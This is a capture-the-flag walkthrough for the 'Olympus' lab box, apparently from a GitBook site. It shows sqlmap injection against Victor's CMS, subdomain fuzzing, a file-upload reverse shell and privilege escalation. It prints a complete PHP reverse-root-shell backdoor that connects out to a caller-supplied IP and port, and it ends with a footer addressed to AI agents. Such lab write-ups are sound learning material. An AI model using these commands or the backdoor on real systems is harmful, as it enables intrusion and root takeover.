# Olympus {% embed url="" %} ## Enumeration ### nmap ```bash PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 0a:78:14:04:2c:df:25:fb:4e:a2:14:34:80:0b:85:39 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPNeXYxrC1xv8fhFNve9CXjWSQcCXnWZThU1putOar7KBcQmoCQUYOqvmS+CDauJMPqVE3rqS0+CpTJnZn2ZWXDaCzFLZ84hjBXq8BqoWOFB0Vv0PjRKfBKC54tpA67NgLfp1TmmlS6jp4i75lxkZ6pSTOPxGUrvYvJ0iN2cAHJkgA9SZDrvT11HEp5oLmS2lXtFSoK/Q9pKNIl7y+07gZLRUeIKIn1bFRc4qrXn+rpDQR2fP9OEYiHhdJmTJJL+KjDAqZmIj0SYtuzD4Ok2Nkg5DHlCzOizYNQAkkj6Ift7dkD6LPebRp9MkAoThDzLya7YaFIP66mCbxJRPcNfQ3bJkUy0qTsu9MiiNtyvd9m8vacyA803eKIERIRj5JK1BTUKNAzsZeAuao9Kq/etHskvTy0TKspeBLwdmmRFkqerDIrznWcRyG/UnsEGUARe2h6CwuCJH8QCPMSc93zMrsZNs1z3FIoMzWTf23MWDOeNA8dkYewrDywEuOvb3Vrvk= | 256 8d:56:01:ca:55:de:e1:7c:64:04:ce:e6:f1:a5:c7:ac (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHFtzLQXLhGiDzPN7Al84lSfH3jFwGniFL5WQSaIjC+VGMU8mbvbGVuOij+xUAbYarbBuoUagljDmBR5WIRSDeo= | 256 1f:c1:be:3f:9c:e7:8e:24:33:34:a6:44:af:68:4c:3c (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKhvoRyjZN/taS1uwwTaQ4uZrGhVUje0YWW4jg4rfdXw 80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Did not follow redirect to http://olympus.thm Device type: general purpose Running: Linux 4.X OS CPE: cpe:/o:linux:linux_kernel:4.15 OS details: Linux 4.15 ``` ### Web page port(80) ![](/files/NQvsGJiatZw24m9M5jzF) ### Directory search

We found something interesting here, especially the `~webmaster` #### \~webmaster As you can see the page is using Victor’s CMS but we don’t know the version so it’s clueless for now

So why not try the functions that the website has? As you can see here’s a login form and a search bar Let’s capture the request on search function with **burpsuite** and you can see the parameters down below

### sqlmap It seems vulnerable enough for us to try sql injection, since exploit.db has the record of sql injection on victor’s cms ```python sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" --dbs --random-agent -v 3 ```

JACKPOT! the SQLi vulnerability confirmed! Now let’s take a look at the `olympus` database ```python sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" -D olympus --dump --dbs --random-agent -v 3 --batch ```

Let’s take the creds and try to login as Prometheus. Sick, now we are one of the gods, lol.

From here I can’t really find something, but remember in the sqlmap the **olympus** database we have a “chat” thing? That might be a subdomain so to check this I use ffuf to confirm ### ffuf ```html ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.10.41.229 -H "Host: FUZZ.olympus.thm" -r -fs 1948,1950 ```

So we found another login page and this time is a chat application. I used the same creds of Prometheus and it worked.

Cool, so it looks like we can upload some files here and you know what time it is, it’s reverse shell time

But when I upload the file it’s no where to be found, I quickly look back to the chat table and found that they will take the file and change the name to absolute gibberish

let’s take a look if the rumor is true, and oh boy yes. Now we gotta find our file and access it to invoke the reverse shell.

#### sqlmap to chat ```python sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" -D olympus --dump -T chats --batch --fresh-queries ``` The `dump` flag won’t update the table so we need to add a `--fresh-queries` flag

And oh boy I uploaded a ton of files lol, just take one of the file and invoke it ### Reverse shell Now we’re in as www-data let’s try to escalate our privilege

#### SUID The first thing to do here is to find what’s maybe vulnerable and my go to is to check the SUIDs We found a **cputils** which is vulnerable

And let’s see if we can be Zeus since he can run sudo, and here we found the **.ssh** directory he might store his private key here

### ssh2john Here we use ssh2john to find the passphrase of the key so that we can login successfully ```bash ssh2john id_rsa > zeus.txt ```

### linpeas Here, we use linpeas to find the vulnerable system inside, but nothing really. ### Privilege escalation Let’s check what can these group access/write/read ```python find / -group adm 2>/dev/null (nothing) ``` ```python find / -group zeus 2>/dev/null ``` I found a file that’s really usual, and it’s a shell executed by root, to confirm simply use `ls -la file.php`

#### The code: ```python Password: '); set_time_limit(0); $host = htmlspecialchars("$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]", ENT_QUOTES, "UTF-8"); if(!isset($_GET["ip"]) || !isset($_GET["port"])) die("

snodew reverse root shell backdoor

Usage:

Locally: nc -vlp [port]
Remote: $host?ip=[destination of listener]&port=[listening port]"); $ip = $_GET["ip"]; $port = $_GET["port"]; $write_a = null; $error_a = null; $suid_bd = "/lib/defended/libc.so.99"; $shell = "uname -a; w; $suid_bd"; chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if(!$sock) die("couldn't open socket"); $fdspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $proc = proc_open($shell, $fdspec, $pipes); if(!is_resource($proc)) die(); for($x=0;$x<=2;$x++) stream_set_blocking($pipes[x], 0); stream_set_blocking($sock, 0); while(1) { if(feof($sock) || feof($pipes[1])) break; $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if(in_array($sock, $read_a)) { $i = fread($sock, 1400); fwrite($pipes[0], $i); } if(in_array($pipes[1], $read_a)) { $i = fread($pipes[1], 1400); fwrite($sock, $i); } if(in_array($pipes[2], $read_a)) { $i = fread($pipes[2], 1400); fwrite($sock, $i); } } fclose($sock); for($x=0;$x<=2;$x++) fclose($pipes[x]); proc_close($proc); ?> ``` See the lines: `$suid_bd = "/lib/defended/libc.so.99";` `$shell = "uname -a; w; $suid_bd";` These are the key for us to get the root privilege, so I just type the command it assigned and now we are root

### flags Where to find the flags? Use **regex** The regex can be like: `grep -irl flag{` * `i`: Makes the search case-insensitive. * `r`: Recursively searches subdirectories. * `l`: Only lists the names of files that contain a match, instead of the matching lines themselves.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://vix-w1zzer.gitbook.io/vixwizzer/walkthroughs/olympus.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.